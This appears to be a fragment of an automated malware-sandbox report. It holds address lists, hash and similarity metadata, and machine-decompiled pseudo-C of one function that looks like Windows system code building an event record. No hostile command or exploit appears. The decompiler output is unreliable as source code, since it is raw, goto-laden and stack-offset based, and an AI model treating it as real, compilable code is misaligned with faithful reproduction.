0x03075fc7
0x0301fe43
0x0301fe45
0x00000000
0x00000000
0x0301fe4b
0x0301fe50
0x03075fd0
0x03075fd6
0x03075fd6
0x03075fd0
0x0301fe5d
0x0301fe60
0x00000000
0x0301fe60
0x0301fe41
0x0301fe41
0x00000000
0x0301fa1b
0x0301fa1b
0x0301fa1d
0x0301fa20
0x00000000
0x0301fa20
0x0301fa15
0x0301f9ed
0x0301f9ed
0x00000000
0x0301f9ed
0x0301f9cd
0x0301f9ba
0x0301f9ba
0x00000000
0x0301f9ba
0x0301fba8
0x0301fb65
0x0301fb1d
0x0301fb23
0x0301fb26
0x00000000
0x0301fb26
0x0301faf3
0x0301faf3
0x00000000
0x0301faf3
0x0301fab4
0x0301fa79
0x0301fa56
0x0301fa56
0x00000000
0x0301fa56
0x0301f94d
0x0301f950
0x0301f955
0x03075e79
0x03075e7f
0x03075e7f
0x03075e79
0x0301f95b
0x0301f960
0x03075e88
0x03075e8a
0x03075e8a
0x03075e8e
0x03075e93
0x00000000
0x03075e99
0x03075e9c
0x03075e9f
0x03075ea1
0x03075ea3
0x03075ea3
0x03075ea7
0x00000000
0x03075ea7
0x0301f966
0x0301f966
0x0301f96b
0x03075eb0
0x03075eb6
0x03075eb6
0x03075eb0
0x0301f973
0x0301fbc7
0x0301f9a5
0x0301f9a5
0x00000000
0x0301f979
0x0301f97d
0x0301f97f
0x03075ebf
0x03075ec5
0x03075ec5
0x03075ebf
0x0301f987
0x00000000
0x0301f98d
0x0301f98d
0x0301f990
0x0301f994
0x0301f997
0x0301f99f
0x0301fff7
0x03020061
0x03020064
0x0302006a
0x03075ece
0x03075ed0
0x03075ed0
0x00000000
0x03020064
0x0301fffd
0x03020000
0x00000000
0x03020006
0x03075ecc
0x00000000
0x03075ecc
0x03020000
0x00000000
0x0301f99f
0x0301f987
0x0301f973

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: ac1962ec977c31db119725822c956056930dac7ed8b4c81a376524656d59c80b
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: E7620332E077678BDBB1CE2885803BAFBF5AF45614F2D87A8CC559B246D371D8518780

Uniqueness

Uniqueness Score: -1.00%

Function 030E5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E030E5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x30f1178);
				E0306D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E030E4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0305D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E030E5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x31060e8;
								if( *0x31060e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x31060e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03059710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03056DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0305F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0305F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0305F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0305FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0305FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0305F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0305F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E030E4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0306D130(_t427, _t494, _t511);
				}
			}

0x030e5ba5
0x030e5baa
0x030e5baf
0x030e5bb4
0x030e5bb6
0x030e5bbc
0x030e5bbe
0x030e5bc4
0x030e5bcd
0x030e5bd3
0x030e5bd6
0x030e5bdc
0x030e5be0
0x030e5be3
0x030e5beb
0x030e5bf2
0x030e5bf8
0x030e5bfe
0x030e5c04
0x030e5c0e
0x030e5c18
0x030e5c1f
0x030e5c25
0x030e5c2a
0x030e5c2c
0x030e5c32
0x030e5c3a
0x030e5c3f
0x030e5c42
0x030e5c48
0x030e5c5b
0x030e5c5b
0x030e5c2c
0x030e5cb7
0x030e5cb9
0x030e5cbf
0x030e5cc2
0x030e5cca
0x030e5ccb
0x030e5ccb
0x030e5cd1
0x030e5cd7
0x030e5cda
0x030e5ce1
0x030e5ce4
0x030e5ce7
0x030e5ced
0x030e5cf3
0x030e5cf9
0x030e5cff
0x030e5d08
0x030e5d0a
0x030e5d0e
0x030e5d10
0x00000000
0x00000000
0x030e5d16
0x030e5d1a
0x00000000
0x00000000
0x030e5d20
0x030e5d22
0x030e5d25
0x030e5d2f
0x030e5d2f
0x030e5d33
0x030e5d3d
0x030e5d49
0x030e5d4b
0x00000000
0x00000000
0x030e5d5a
0x030e5d5d
0x030e5d60
0x00000000
0x00000000
0x030e5d66
0x030e5d69
0x00000000
0x00000000
0x030e5d6f
0x030e5d6f
0x030e5d73
0x030e5d79
0x030e5d7f
0x030e5d86
0x030e5d95
0x030e5d98
0x030e5dba
0x030e5dcb
0x030e5dce
0x030e5dd3
0x030e5dd6
0x030e5dd8
0x030e5de6
0x030e5dec
0x030e5dee
0x030e5df1
0x030e5df3
0x030e635a
0x030e635a
0x00000000
0x030e635a
0x030e5dfe
0x030e5e02
0x030e5e05
0x030e5e07
0x030e5e10
0x030e5e13
0x030e5e1b
0x030e5e1c
0x030e5e21
0x030e5e22
0x030e5e23
0x030e5e25
0x030e5e2a
0x030e5e2c
0x030e5e2e
0x030e5e36
0x030e5e39
0x030e5e42
0x030e5e47
0x030e5e4d
0x030e5e54
0x030e5e54
0x030e5e54
0x030e5e2e
0x030e5e5c
0x030e5e5f
0x030e5e62
0x030e5e64
0x030e5e6b
0x030e5e70
0x030e5e7a
0x030e5e7a
0x030e5e7a
0x030e5e6b
0x030e5e7e
0x030e5e7f
0x030e5e7f
0x030e5e81
0x030e5e87
0x030e5e8b
0x030e5e8c
0x030e5e8c
0x030e5e8c
0x030e5e9a
0x030e5e9c
0x030e5ea2
0x030e5ea6
0x030e5f50
0x030e5f50
0x030e5f57
0x030e5f66
0x030e5f66
0x030e5f66
0x030e5f68
0x030e5f6a
0x030e63d0
0x00000000
0x030e5f70
0x030e5f70
0x030e5f91
0x030e5f9c
0x030e5f9e
0x030e5fa4
0x030e5fa6
0x030e638c
0x030e6392
0x030e63a1
0x030e63a7
0x030e63af
0x030e63af
0x030e63bd
0x030e63d8
0x00000000
0x030e63d8
0x030e5fac
0x030e5fb2
0x030e5fb4
0x030e5fbd
0x030e5fc6
0x030e5fce
0x030e5fd4
0x030e5fdc
0x030e5fec
0x030e5fed
0x030e5fee
0x030e5fef
0x030e5ff9
0x030e5ffa
0x030e5ffb
0x030e5ffc
0x030e6000
0x030e6004
0x030e6012
0x030e6012
0x030e6018
0x030e6019
0x030e601a
0x030e601b
0x030e601c
0x030e6020
0x030e6059
0x030e605c
0x030e6061
0x030e6061
0x030e6022
0x030e6022
0x030e6022
0x030e6025
0x030e602a
0x030e602b
0x030e6031
0x030e6037
0x030e6038
0x030e603e
0x030e6048
0x030e6049
0x030e604a
0x030e604b
0x030e604c
0x030e604d
0x030e6053
0x030e6054
0x030e6054
0x030e6062
0x030e6065
0x030e6067
0x030e606a
0x030e6070
0x030e6075
0x030e6076
0x030e6081
0x030e6087
0x030e6095
0x030e6099
0x030e609e
0x030e60a4
0x030e60ae
0x030e60b0
0x030e60b3
0x030e60b6
0x030e60b8
0x030e60ba
0x030e60ba
0x030e60ba
0x030e60ba
0x030e60be
0x030e60c0
0x030e60c5
0x030e60c5
0x030e60c5
0x030e60c6
0x030e60cd
0x030e6114
0x030e60cf
0x030e60cf
0x030e60d4
0x030e60d5
0x030e60da
0x030e60db
0x030e60e1
0x030e60e2
0x030e60e8
0x030e60f8
0x030e60fd
0x030e60fe
0x030e6102
0x030e6104
0x030e6107
0x030e6109
0x030e610b
0x030e610b
0x030e610b
0x030e610b
0x030e610f
0x030e610f
0x030e6117
0x030e611a
0x030e611f
0x030e6125
0x030e6134
0x030e6139
0x030e613f
0x030e6146
0x030e6148
0x030e614b
0x030e614d
0x030e614f
0x030e614f
0x030e614f
0x030e614f
0x030e6153
0x030e6159
0x030e6159
0x030e615c
0x030e6163
0x030e6169
0x030e616c
0x030e6172
0x030e6181
0x030e6186
0x030e6187
0x030e618b
0x030e6191
0x030e6195
0x030e61a3
0x030e61bb
0x030e61c0
0x030e61c3
0x030e61cc
0x030e61d0
0x030e61dc
0x030e61de
0x030e61e1
0x030e61e4
0x030e61e6
0x030e61e8
0x030e61e8
0x030e61e8
0x030e61e8
0x030e61e6
0x030e61ec
0x030e61f3
0x030e6203
0x030e6209
0x030e620a
0x030e6216
0x030e621d
0x030e6227
0x030e6241
0x030e6246
0x030e624c
0x030e6257
0x030e6259
0x030e625c
0x030e625e
0x030e6260
0x030e6260
0x030e6260
0x030e6260
0x030e625e
0x030e6264
0x030e6267
0x030e6269
0x030e6315
0x030e6315
0x030e631b
0x030e631e
0x030e6324
0x030e6327
0x030e632f
0x030e6330
0x030e6333
0x030e633a
0x030e633c
0x030e6335
0x030e6335
0x030e6335
0x030e633f
0x030e6342
0x030e634c
0x030e6352
0x030e6355
0x030e6355
0x030e6359
0x00000000
0x030e626f
0x030e6275
0x030e6275
0x030e6278
0x030e627e
0x030e627e
0x030e6281
0x030e6287
0x030e628d
0x030e6298
0x030e629c
0x030e62a2
0x030e629e
0x030e629e
0x030e629e
0x030e62a7
0x030e62a7
0x030e62aa
0x030e62b0
0x030e62f0
0x030e62f0
0x030e62f2
0x030e62f8
0x030e62fd
0x030e62b2
0x030e62b2
0x030e62b2
0x030e62b5
0x030e62dd
0x030e62e2
0x030e62e5
0x030e62b7
0x030e62b8
0x030e62bb
0x030e62bd
0x030e62c0
0x030e62c4
0x030e62cd
0x030e62cd
0x030e62c0
0x030e62bb
0x030e62b5
0x030e6302
0x030e6303
0x030e6305
0x030e6305
0x030e6305
0x030e630c
0x030e630c
0x00000000
0x030e627e
0x030e6269
0x030e5eac
0x030e5ebb
0x030e5ebe
0x030e5ecb
0x030e5ecb
0x030e5ece
0x030e5ece
0x030e5ed4
0x030e5ed7
0x030e5ed9
0x030e5edb
0x030e5edb
0x030e5ee1
0x030e5ee1
0x030e5ee3
0x030e5f20
0x030e5f20
0x030e5ee5
0x030e5ee5
0x030e5ee5
0x030e5ee8
0x030e5f11
0x030e5f18
0x030e5eea
0x030e5eea
0x030e5eed
0x030e5ef2
0x030e5ef8
0x030e5efb
0x030e5f0a
0x030e5f0a
0x030e5eed
0x030e5ee8
0x030e5f22
0x030e5f28
0x00000000
0x00000000
0x030e5f30
0x030e5f31
0x030e5f37
0x030e5f3a
0x030e5f3d
0x030e5f44
0x00000000
0x00000000
0x00000000
0x030e5f46
0x030e5f48
0x030e5f4d
0x00000000
0x030e5f4d
0x030e5dda
0x030e5ddf
0x00000000
0x030e5ddf
0x030e5dd8
0x030e5da7
0x030e5da9
0x030e5dac
0x030e5dae
0x00000000
0x030e5db4
0x030e5db4
0x00000000
0x030e5db4
0x030e5dae
0x030e5d88
0x030e5d8d
0x030e6363
0x030e6369
0x030e636a
0x030e6370
